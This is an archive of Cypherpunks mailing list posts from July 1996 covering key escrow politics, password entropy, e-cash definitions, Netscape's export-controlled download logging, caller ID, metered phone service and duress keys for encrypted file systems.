>punctuation characters between words making up a password or key. Since the
>length of the words used is unknown to the cracker, this makes his job
>harder.
>
>That is--a dictionary which accomodates such things as the above will be
>pretty large. With the number rule, there would have to be 10 additional
>versions of the one-letter word, 10 versions of each leading character
>making up a two letter word, and then it starts increasing combinatorially.
>Might as well use brute force.

In a "universe" of n-character passwords, whatever length n is, the use of
English, German, Elvish, Klingon, whatever words can be looked as
"galaxies."

(That is, clusters in an otherwise uniform space.)

Thus, "David" is one of the galaxies, and ""Da5id," "david," "Daphid," etc.
are just some of the stars in this galaxy of "nearby" strings.

Calculations of entropy and all. Be very careful.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SpyKing <SpyKing@thecodex.com>
Date: Tue, 16 Jul 1996 20:55:14 +0800
To: (Recipient list suppressed)
Subject: 50,000th Visitor a Winner!
Message-ID: <9607160332.AA27200@mne.com>
MIME-Version: 1.0
Content-Type: text/plain


Have you heard about the Codex Counter Contest? Every once and a while we
post a target number for our page counter...if you are the lucky person who
visits our site on that number according to the Connect2 counter...you win!
All you need to do is print the page and fax it to us to collect your free
prize!

The first winner was Kevin Mullen aka jmulle@gremlan.org  - Kevin won a
brand new Sony 8mm video recorder (one thousand dollar value).
Congradulations Kevin and enjoy your prize!

P.S. While you're there, checkout some of our great resources and
products...and don't forget to visit the The Codex Mall.






This communication is copyrighted by the author.
1996, All Rights Reserved. This communication may be read only by the person
to whom it is addressed. Unauthorized interception, forwarding,
posting/re-posting of all/any part of this message is a violation of U.S.
Copyright laws and may result in civil or criminal action against violators. 
The Codex Surveillance & Privacy News - http://www.thecodex.com
PGP Key Available upon Request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 17 Jul 1996 01:13:30 +0800
To: Christopher Hull <cypherpunks@toad.com>
Subject: Re: CookieScan 0.0 rev 0
Message-ID: <v02120d02ae10e356f433@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:34 7/15/96, Christopher Hull wrote:
>Do y'all think there might be an interest in a
>utility which would allow the user to deal with
>browser cookies?

For Win95 you can get Internet Fast Forward. Not only does it give you full
control over cookies, it also gets rid of the annoying ad banners that
clutter your screen. <http://www.privnet.com/>



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 16 Jul 1996 19:57:21 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Can't block caller ID in Massachusetts?
Message-ID: <v02120d03ae10e4a442cf@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:37 7/15/96, Alan Horowitz wrote:
[...]
>> It's especially annoying when they've got an in-state or other
>>non-nation-wide
>> 800 number, or when you're calling from outside the US, especially when
>> they're a business you'd like to be able to reach from anywhere, any time,
>> like the travel agent your office uses
>
>    Your straining my credulity to claim that you can't get ahold of the
>regular phone number of them.   Come on, are you 7 years old?

How do you get a hold of the phone number if you don't know the location of
the company, they aren't on the net, and don't have the US phone numbers
CD-ROM handy? I am 33 and have yet to figure this one out...



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 16 Jul 1996 20:58:22 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <v02120d04ae10e7dc0457@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 7/15/96, David Sternlight wrote:
[Oh boy. DS discovered Cypherpunks. Well, I guess it was only a matter of
time. You folks thought this list was active? Get ready for the onslaught.
Hi, David. :-]

>That's certainly one view. Another is that if you watch the precursors of
>legislation, then actions in the Netherlands, the UK, and in the European
>Parliament suggest that an independent European escrow initiative might
>happen within a year. When it does it will be a trivial matter to harmonize
>it with some US offering. The mills in various countries are grinding too
>coincidentally for my taste.
>
>Given the glacial pace with which standard integrated crypto has appeared
>on the Internet, with Navigator only going to offer the final
>link--encrypted e-mail--later this year, the above timing isn't necessarily
>one which will be left behind by independent Internet developments. And
>given the glacial pace of PGP movement toward integrated internet standard
>products, it hasn't a hope of beating the above timing to the punch.

David is correct. Strong crypto standardization and integration have made
little progress in the last two years. This is not about to change. In
fact, any standard that is likely to be widely agreed upon will be a weak
crypto standard. S/MIME with its 40 bit default key length is a prime
example.

Meanwhile, the governments in just about any country with an Internet
connection, certainly the governments in the US, Australia, and the EC are
marching in lock step to implement global GAK. There is not a single
significant market in the western world in which GAK is not either being
proposed, studied by pro-GAK "working groups", or already implemented. We
might see GAK nearly world wide within two years. The question isn't if GAK
will happen but only when it will happen. The speed by which GAK will
become the law depends on a few factors, many of which are out of our
control. Primarily, that means number and severity of Reichstag Fires the
GAK proponents can make use of to push their cause.

The odds seem slim that we will win the race to the mythical fork in the
road at which point crypto regulations will no longer matter, because
strong crypto is too widely deployed.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 16 Jul 1996 23:11:59 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: brokers as middlemen
In-Reply-To: <ae0fd46309021004509f@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960716001046.828B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996, Timothy C. May wrote:
> At 5:48 PM 7/15/96, L. Detweiler wrote:
> >that could be regarded as the ultimate capitalist market-- something
> >that eliminates all "unnecessary" middlemen. I suspect the stock exchanges
> >of the future will *not* be regulated because they *cannot* be. it
> >will be a matter of buyers and sellers choosing the systems that
> >best suit them regardless of what governments feel is appropriate, fair,
> >or whatever.
> I emphatically agree! There is little need for regulation in this new
> environment, and "reputations matter." And regulation is becoming
> problematic.
> (To cite one example. Some are calling for registration and regulation of
> "investment advice," which is largely unregulated in the U.S. today. That
> is, I can self-publish a newsletter, "Tim's Stock Picks," and the First
> Amendment says this can't be restricted (Caveat: But I can't sell "Tim's
> Legal Advice," "Tim's Earthquake Safety Advice," or "Tim's Medical Advice"
> to clients...go figure). Some want investment newsletter writers "held

     While IANAL, and I don't know for sure about "Tim's Legal Advice", 
there is NOLO press, I don't think they are lawyers. I don't understand 
why you couldn't print "Tim's Earthquake Saftey Advice" as long as the 
advice wasn't totally erroneous. As to the last, you most certainly _can_ 
publish "Tim's Health Advise, or Tim's Homeopathic Newsletter and give 
essentially medical advise. 

     The non-crypto snake oil business is a big as ever in the US. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 17 Jul 1996 03:53:45 +0800
To: David Sternlight <froomkin@law.miami.edu>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607160801.BAA19649@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:02 PM 7/15/96 -0700, David Sternlight wrote:
>At 7:03 AM -0700 7/15/96, Michael Froomkin wrote:
>>On Sun, 14 Jul 1996, Timothy C. May wrote:
>>
>>> So, who is in this "emerging consensus"?
>>>
>>Foreign governments?
>>(Process of elimination, not inside info...)
>
>Perhaps. And the vast inside-the-Beltway policy community,

"Policy"?  I'm reminded of the fact that the whole concept of "policy" (as 
used in Washington DC) contains embedded within it its own set of biases.  
The concept of "national encryption policy" (a phrase I've seen before) 
implicitly assumes that there is (or must be) a _national_ policy, as 
opposed to a whole bunch of _individual_ policies.  (Jim Bell's individual 
encryption policy is to get PGP and use it here and there, and try to keep 
up with newer developments, etc.)  My opinion is that "nations" don't NEED 
"encryption policies" unless they intend to screw their citizens.

"Policy", used in this way, is merely a smokescreen (or a shorthand) for a 
group of assumptions that toe the government's line.  The people who make 
such assumptions rarely stick around to defend them.

> most of whom are more like Dorothy Denning than Tim May. 

To the extent that they are POLICY (as in _government_ policy) people (with 
all the biases I've alluded to) that wouldn't be surprising.  However, it is 
still extraordinarily dishonest for them to refer to an "emerging consensus" 
when they must well understand that the document they wrote was intended to 
be understood by ordinary people, not government-suck-ups.  

I'm reminded of an idiotic cover for a Classical Music CD directory book 
about 10 years ago, which grandly claimed that the book indexed "every CD 
published" but forgot to add the word "classical" adjective to that phrase.  
Without opening the book, you couldn't tell that the directory only listed 
classical CD's.  A "policy"  person who says there's an "emerging consensus" 
for key escrow has a similarly myopic point of view.

>And the vast business community
>that prefers automated escrow in standard systems.

I feel certain that whatever portions of the business community that 
"prefers automated escrow" will get it, in forms which don't make the 
government particularly happy.

> What I mean by that is
>software or chips automatically escrowed to, say, Price Waterhouse.
>Business is comfortable dealing with such firms in a trusted relationship,
>and such firms will honor a valid court order to produce records or the
>equivalent--a probable cause court-order for a wiretap.

Most "chips" won't need to be escrowed, for reasons that have been adequated 
addressed so far.  Data transfer encryption doesn't have to be escrowed, as 
Tim May pointed out.  And, of course, an encryption chip needn't contain any 
sort of permanently-written key, thus obviating the need for "escrow" at all.


>It really depends on how the issue is presented. If it is presented as
>preserving law enforcement access, escrow follows.

No, escrow DOESN'T follow!  I think most people who are aware of the issues 
figures that the advent of encryption will provide dramatic net benefits for 
the public, even after potential negatives such as criminal use of 
encryption are factored in.


> The problem is that like
>the nose of the camel, each new piece of legislation establishes a new
>status quo baseline of principle from which to argue, and though we all
>kicked and screamed about it here, the new baseline is the Digital
>Telephony Act.

I concede NOTHING.  That Act hasn't been funded, may not be, and with every 
passing month there are more people  on the 'net who will understand how 
unacceptable it is. It's also going to be irrelevant as encrypted telephones 
appear, and 'net telephone access becomes more common.  No new "baseline of 
principle" is produced.  Only the thugs who are trying to foist it all on us 
would like to believe this.

>As for the only counterargument to the above, that bad guys aren't going to
>use escrowed systems, nothing is perfect, goes the argument, and the FBI
>has caught plenty of bad guys who presumably should have known better, via
>wiretaps.

"the only counterargument"?    What are you, a comedian?


>If you look into it, you will find that most people with criminal minds
>don't expect to get caught.
>
>Given the nature of this group it perhaps needs saying that the above is a
>competitor analysis, not an argument nor my own position on mandatory
>domestic key escrow. I'm agin it.

Which is not adequate.  To the extent I believe that the market will decide, 
if I model the market as a double-pan balance, which makes a decision as to 
which side is heavier, I don't want to see the heavy thumb of government 
pressing down on one of the pans.  That's precisely what the US government 
tried to do with Clipper, and astonishingly it appears to have failed.   To 
merely say that you're against "mandatory" escrow strongly implies that you 
would accept manipulation of the market in order to allow government to 
achieve its goals , as long as there is an illusion of a choice.  I won't, 
and I think most people won't, either.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jul 1996 21:50:07 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: DCSB: Betting on the Future
Message-ID: <199607160806.BAA19805@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 PM 7/15/96 -0400, Robert Hettinga wrote:

>                 The Digital Commerce Society of Boston
>                               Presents
>                             Duane Hewitt
>                             Idea Futures
>> I will introduce the concept of Idea Futures which is a market in which
>> the odds of future events are set by betting. It is designed to reward
>> those who can accurately forecast future outcomes. 


Hmmmm...  Betting on future events...  What a novel idea...
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 17 Jul 1996 01:27:54 +0800
To: cypherpunks@toad.com
Subject: WON_der
Message-ID: <199607160108.BAA16729@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-15-96. NYP, Book review: 
 
      AFTER THOUGHT 
      The Computer Challenge to Human Intelligence 
      By James Bailey 
      Illustrated. 277 pages Basic Books/HarperCollins. $25. 
      ISBN 0-465-00781-3 
 
 
   Mr. Bailey, a former senior manager at the Thinking 
   Machines Corporation, foresees an "electronic computing 
   revolution" whose "intellectual impact will be greater than 
   anything since the Renaissance, possibly greater than 
   anything since the invention of language." In his view, the 
   greatest challenge posed by the computer revolution will be 
   for humans to trust processes of thinking they won't 
   necessarily understand, such as neural networks spotting 
   patterns without supplying proof "in any human-absorbable 
   form." 
 
   His main point is that we must become aware of the outmoded 
   abstractions on which our sequential thinking is based and 
   to jettison them in favor of parallel processes. He cites 
   Alfred North Whitehead: "A civilization which cannot burst 
   through its current abstractions is doomed to sterility 
   after a very limited burst of progress." The wonder of Mr. 
   Bailey's book is that he makes us aware of things abstract 
   that all our lives we have been trained to think of as 
   concrete. 
 
   ----- 
 
   http://pwp.usa.pipeline.com/~jya/wonder.txt  (7 kb) 
 
   WON_der 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 16 Jul 1996 22:11:20 +0800
To: cypherpunks@toad.com
Subject: Surf-filter lists
Message-ID: <199607160541.BAA11900@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text



Vlad: How can consumers make an informed decision as to which filter
they wish to purchase, if they are not told exactly what information
each product is filtering out?

Meeks et al may be guilty of flamboyant, emotionalistic prose, but I
find the concept that the public is expected to buy various filters
without knowing what they filter...frankly, ridiculous.

--
"Your wish is my command, if you know what's good for you, bitch."
  - William Shakespeare
(Or perhaps it was his brother Fred who said that.)
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 17 Jul 1996 02:07:33 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
Message-ID: <ae10a39c010210045882@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 AM 7/16/96, David Sternlight wrote:

>And another thing. The reason I've not joined this group earlier had
>nothing to do with "worthy". It was because after discussion a year or so
>ago, Tim May suggested to me via e-mail that it would just generate a lot
>of controversy, at a time when people were so polarized that they couldn't
>hear each other and thus my presence here would serve no useful purpose.  I
>took Tim's advice and stayed out.

Hmmmhhh...I don't recall the context of our discussion. Certainly I would
not discourage anyone from joining who really wanted to. (I also might have
said that list views were fairly well-set, and that few minds would be
changed by debating certain core issues. Again, I don't recall the context
of my remarks to David.)

In any case, I certainly welcome David Sternlight to our list. I have not
often agreed with all or even many of his points, and I feel he is often
abrasive (but, aren't a lot of us?), but I don't think he "wrecked" any
newsgroups, much less sci.crypt. (But I've been away from sci.crypt and
talk.politics.crypto for quite some time....)

There were some flames, which I mostly ignored. Also, a peculiar kind of
flame war dealt with endless speculations about his "motives." Utter
nonsense, from careful reading of his views. That is, to insinuate that he
is an agent of the NSA or the Bilderberger Grand Conspiracy merely because
he (then) argued that Clipper was not as bad as most of us thought it
was...well, that's just nonsensical.

>The presenting symptom for my joining now was a copy of a post by an MIT
>professor I respect to this group, which a colleague sent me. Perhaps I was
>too hasty in my belief that we can begin to hear each other.

As a point of information, many outsiders copy our list on crypto-related
things for whatever reasons, without actually being contributors to
ordinary discussions (or perhaps without even being subscribers).

A decision to remain subscribed should be based more on what is seen on a
daily basis than on what occasionally comes over the transom from MIT.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven Seyffert" <steven@knoware.nl>
Date: Tue, 16 Jul 1996 15:19:38 +0800
To: <bryce@digicash.com>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <199607152349.BAA14860@utrecht.knoware.nl>
MIME-Version: 1.0
Content-Type: text/plain



----------
: From: bryce@digicash.com
: To: David G.W. Birch <daveb@hyperion.co.uk>
: Cc: Multiple recipients of <e$@thumper.vmeng.com>; cypherpunks@toad.com
: Subject: Re: #E-CASH: PRODUCT OR SERVICE? 
: Date: maandag 15 juli 1996 15:36
: 
: 
: -----BEGIN PGP SIGNED MESSAGE-----
: 
: I think it would behoove us all to clarify our terms.  I call
: Ecash(tm) coins "electronic cash" for several reasons.  Ecash(tm)
: has all of the following characteristics in common with
: conventional cash, in descending order of importance:
: 
: 
: 1.  Unforgeability.  Ecash(tm) coins have intrinsic value 
: because they are cryptographically impossible to forge.
:
forgery is possible in 'real life' and is possible in 'virtual
life'(another discussion wright there). It all depends on the amount of
control and need of insider knowledge to be able to crack a system. The
existence of a system is defined by the possibility of a crack. 

: 
: 
: 2.  Finality.  Payments are cleared on the spot.  No outstanding
: payment obligations remain after a purchase.
: 
You are from digicash aren't you? Isn't this the dutch experiment on
Ecash?(could be wrong there). I've been asking around and it seems
digicash is one system whilst it becomes more and more competitors(for
example www.digipass.com). The main difference I've heard is the one about
argument between customer and bank about the amount of money that was
transferred from bank to ecash to the E-store. Digipass seems to be
working with a code generator that includes the amount parameter in the
algorythm that generates the code that is send back to the bank or
whatever.

: 3.  Bi-directionality.  Payers and recipients use the same 
: software and the same protocol.  It is not necessary for
: recipients to be specially trusted by the bank or by the payers.
:
The fact is, I think, that some major battle is going to take place on the
grounds of ecash. We're going to have quite a lot of protocols and
software used within different conglomerates of company's. Only time will
decide with which protocol we are going to buy our pizza's.

: 4.  Privacy.  The privacy of Ecash(tm) payers is mathematically
: unconditional.
:
Just like the privacy of e-mail and the independance of the WWW once was.

 
: 5.  Composability.  You can make large Ecash(tm) payments out of
: a collection of smaller Ecash(tm) coins.  This is in contrast to
: a check-based system where you typically draw a check for the
: exact amount and transfer only a single check.
:
You're wright, though I always seem to end up with fewer money than I
thought I had at the beginning of each month
 
: 6.  Small payments.  Ecash(tm) coins are cheap enough to use 
: that they are practical for small payments.
: 
: (As a note, I do not use the word "micropayments" here, because
: I am beginning to think that a good technical definition of
: "micropayments" is "payments whose value is less than the cost
: of using current electronic coins".  This qualifies schemes like
: Shamir's and disqualifies, well...  current electronic coins.)
: 
: 
: There might be other angles we should talk about here.
: 
: 
: I think that the first quality is the defining one, technically.
: 
: 
: So, could a knowledgeable person e.g. Mr. Birch tell us why
: Mondex should be considered to be "electronic cash"?  
: 
: 
: And similarly I would like to hear an informed opinion about 
: why Ecash(tm) should not be considered "electronic cash".  
: I tend to agree that Ecash(tm) would be even _more_ cashlike 
: if it were cleared off-line, but I don't consider that 
: difference very fundamental.  (_Any_ digital money based on 
: our current understandings will have to be cleared at a 
: central clearer eventually, since digital information is 
: perfectly copyable.)
: 
: 
: Thank you for your correspondance.
: 
: 
: Regards,
: 
: Bryce
: 
: Ecash 2.x Team
: 
: 

: 
: -----BEGIN PGP SIGNATURE-----
: Version: 2.6.2i
: Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2
: 
: iQB1AwUBMepI/UjbHy8sKZitAQEiJwL/VnpQEHL1rOQ6Hm9JIEgAfCGjSKOPaIiC
: Jp7EVjvPoFYEsQAS4iUWybNLpxi/23uaqpXMCSNMrEwqd8WeC5ZSISldIEK/BnYE
: 2bULeAeMhIqm92bP6o64ok1NBGPfvK5X
: =ANO4
: -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 16 Jul 1996 22:01:10 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Metered Phone
In-Reply-To: <199607150749.AAA07586@toad.com>
Message-ID: <Pine.LNX.3.94.960716022509.1476F-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 15 Jul 1996, Bill Stewart wrote:

> Date: Mon, 15 Jul 1996 00:45:48 -0700
> From: Bill Stewart <stewarts@ix.netcom.com>
> To: Jerome Tan <jti@i-manila.com.ph>
> Cc: cypherpunks@toad.com
> Subject: Re: Metered Phone
> 
> At 01:19 PM 7/7/96 +0800, you wrote:
> >Does anyone have any ideas about this metered phone? 
> >I am from Philippines and heard some news that it will be 
> >existing in 1997. Quite a big problem! Every dial will be counted, 
> >every seconds will be measured...
> 
> That sounds like you're getting newer telephone technology.
> In the US, most areas with newer telephone switches offer you
> the choice of flat rate service (you pay a constant price per month
> for calls in your city or other local area) or measured service
> (you pay a lower price per month plus a few cents per minute
> for local calls.)  In many places with measured service,
> the phone company measures how much time you use for local calls,
> but doesn't record who you call, only how many minutes.
> For long-distance calls, which always charge for time,
> they do record what number you call.
> 
> For computer users, there are two issues -
> - recording who you call is, of course, bad 
> - if you have flat rate telephone service, you can stay
> connected to your Internet provider full time,
> instead of calling up every N minutes or when you have mail.
> 
> #				Thanks;  Bill
> # Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
> # http://www.idiom.com/~wcs
> #				Re-delegate Authority!
> 
> 

More often than not when you are being metered, they include a list of who
you call and how long you spend on each call with your bill.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMer96zAJap8fyDMVAQHycAf+M0l8kzYptzesG6Kn8gOeTA9GZYbDTzAV
0ropLLCbZJl5tMGw8+BhhzGbRwWrenmUcT7SDm2SDzXXIUItY+UMF70U+fuiHOG5
CXAQftzpvgNuQYivVRC6cdoM1o3rTgfIPTlBHYH18uyxpFThA3VXVDRXjs9Tn6I/
WpnKhnQWWZM7Ms/8lLDLQmD9gALjlUC0BcvASS9eLczwtizG/08WIy8Z3A4PP56w
g463Wbg9pVTWq4AKCTvS0Tz+j/Yp5lEKiPY0gRnjck0ThkU/QmetFhSXMRJt3KMI
wBzxuKxoIsWUstrtxohORXddeURTTKaoM3yVemjBHBZqbZj5J0+gEA==
=rQnN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 17 Jul 1996 00:21:40 +0800
To: Julian Burke <julianb@mail.tiac.net>
Subject: Re: Netscape download requirements
In-Reply-To: <199607160905.FAA26831@mailserver1.tiac.net>
Message-ID: <31EB61E5.520E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Julian Burke wrote:
> 
> Jeff Weinstein wrote:
> 
> >  We received written permission from the State Department for our
> >download verification mechanism.
> 
> What exactly is the reason for Netscape asking for the name, address,
> e-mail address, and telephone number of anyone who wishes to download
> the US-browser? If I remember correctly MIT in distributing PGP only
> asks that you affirmatively assent to obeying export laws (and the
> terms of the rsa license).
> 
> I have not heard at any point that the MIT system does not meet the
> legal requirements of ITAR. Is there perhaps some other reason
> Netscape wishes to have this information?

  The Department of State tells us that permission was granted to
MIT and others under the "old policy".  The "new policy" has not
been completed, which led to long delays in our getting approval.
Our current approval is temporary, pending release of the "new
policy".  In order to get this permission we agreed to ask for and
archive this information, in case law enforcement required it for
some related investigation.  The following statement is at the
bottom of the page, near the submit button:

	ALL SUBMISSIONS ARE LOGGED
        Misrepresentation or omission of facts is covered under
	ITAR 127.2(a) and (b)(13).
	These data will only be released to satisfy lawful requests by
	government agencies, should such requests be made.

  That last sentance means that we won't be selling the list to
telemarketers, or making it publicly available.

  If you are not comfortable providing this information, then you
may either run the export version, or purchase the retail navigator
package, which also includes the US only version when sold in the US.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Julian Burke" <julianb@mail.tiac.net>
Date: Tue, 16 Jul 1996 23:07:30 +0800
To: jsw@netscape.com
Subject: Netscape download requirements
Message-ID: <199607160905.FAA26831@mailserver1.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein wrote:

>  We received written permission from the State Department for our
>download verification mechanism.

What exactly is the reason for Netscape asking for the name, address, 
e-mail address, and telephone number of anyone who wishes to download 
the US-browser? If I remember correctly MIT in distributing PGP only 
asks that you affirmatively assent to obeying export laws (and the 
terms of the rsa license).

I have not heard at any point that the MIT system does not meet the 
legal requirements of ITAR. Is there perhaps some other reason 
Netscape wishes to have this information? 

--Julian Burke







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 17 Jul 1996 18:01:14 +0800
To: cypherpunks@toad.com
Subject: PARC Forum, 7-18-96, Gregory Schmid, "The Future of ConsumerElectronic
Message-ID: <v03007602ae1126cdb291@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: mikkelsen@parc.xerox.com (Jim Mikkelsen) (by way of
frantz@netcom.com (Bill Frantz))
Mime-Version: 1.0
Precedence: Bulk
Date: Mon, 15 Jul 1996 11:53:09 -0700
From: mikkelsen@parc.xerox.com (Jim Mikkelsen) (by way of frantz@netcom.com
(Bill Frantz))
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: PARC Forum, 7-18-96, Gregory Schmid, "The Future of Consumer
Electronic

Xerox PARC Forum
Thursday, July 18, 1996, 4:00PM, PARC Auditorium

The Future of Consumer Electronic Payments:  The Impact on the Distribution
Chain

Gregory Schmid, Institute For The Future

        This talk explores the critical changes pushing consmers into the
world of electronic transactions--improved technologies, better security,
and consumers' growing experience with card-based and other electronic
transaction technologies.  These changes will not only affect customer
behaviors, but will transform the distribution chain, bring in new players,
force the current players to fundamentally transform the way they conduct
business, and encourage policymakers to find the right balance of
regulation and market forces.
        Combined, these impacts will change the basic relationship between
businesses and their customers forever.  Only the stakeholders who are
prepared for such changes will carve out their place in the new world.

Greg directs IFTF's long-term forecasting and strategic planning efforts in
both the public and private sectors.  He has been Director of IFTF's
Corporate Associates Program (CAP) since its inception in 1976 and is also
the overall editor of CAP's "Ten-Year Forecast."  Greg has overseen
projects for many Fortune 500 companies, including those in the financial
services, high technology, consumer products, professional services, and
healthcare industries.  As an economist, historian, and policy analyst,
Greg uses a variety of research and planning techniques to work with
clients in exploring strategic choices.  His most recent book is "Future
Tense: The Business Realities of the Next Ten Years" (William Morrow, 1994)
with Ian Morrison.  Before joining IFTF Greg headed a research division of
the Federal Reserve Bank of New York.  A graduate of Yale, Greg received
his Ph.D. in economics from Columbia University.

-------------------------------
This Forum is OPEN to the public.

Host: Jim Mikkelsen  415-812-4401

Web site: http://www.parc.xerox.com/ops/projects/forum

Requests for videotapes for "Xerox Employees Only" should be sent to Susie
Mulhern (Mulhern@parc.xerox.com).

Refreshments will be served from 3:45 - 4:00PM.

The PARC Auditorium is located at 3333 Coyote Hill Road in Palo Alto.  We
are located in the Stanford Research Park, between Page Mill Road (west of
Foothill Expressway) and Hillview Avenue.  The easiest way to get here is
to take Page Mill Road to Coyote Hill Road, and, as you drive up Coyote
Hill between the horse pastures, PARC is the only building on the left
after you crest the hill.  Please park in the large (lower) lot to your
right; enter the auditorium at the upper level of the building.  (The
auditorium entrance is located to the left of the main door and down the
stairs.)

-------------------------------
Next Week's Forum is Shirley Tessler, Stanford University, on "A Pilot
Study of Software Product Management."







--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 17 Jul 1996 00:06:39 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Opiated file systems
In-Reply-To: <Pine.SCO.3.93.960715172915.7563D-100000@grctechs.va.grci.com>
Message-ID: <Pine.LNX.3.94.960716090027.5360D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 15 Jul 1996, Mark O. Aldrich wrote:

> Date: Mon, 15 Jul 1996 17:43:28 -0400 (EDT)
> From: "Mark O. Aldrich" <maldrich@grci.com>
> To: Deranged Mutant <WlkngOwl@unix.asb.com>
> Cc: Adam Back <aba@dcs.ex.ac.uk>, cypherpunks@toad.com
> Subject: Re: Opiated file systems
> 

[Usefull stuff >/dev/null]

> 
> The payload of getting false data out of a crypto algorithm, such that the
> data looks "real", when a duress key is input to the algorithm is not
> something that I've seen approached in any reasonable manner.  Probably
> because it's just too damn hard and the notion of "real looking" data is a
> little hard to define scientifically.  A combination stego/crypto solution
> may be more appropriate, but close examination of the box is going to
> reveal what happened (assuming the desired solution must withstand some
> protracted forensics?).  The nuke_the_data or nuke_the_keys solutions are
> easier to do, and have been implemented in several situations of which I
> am aware.  
> 

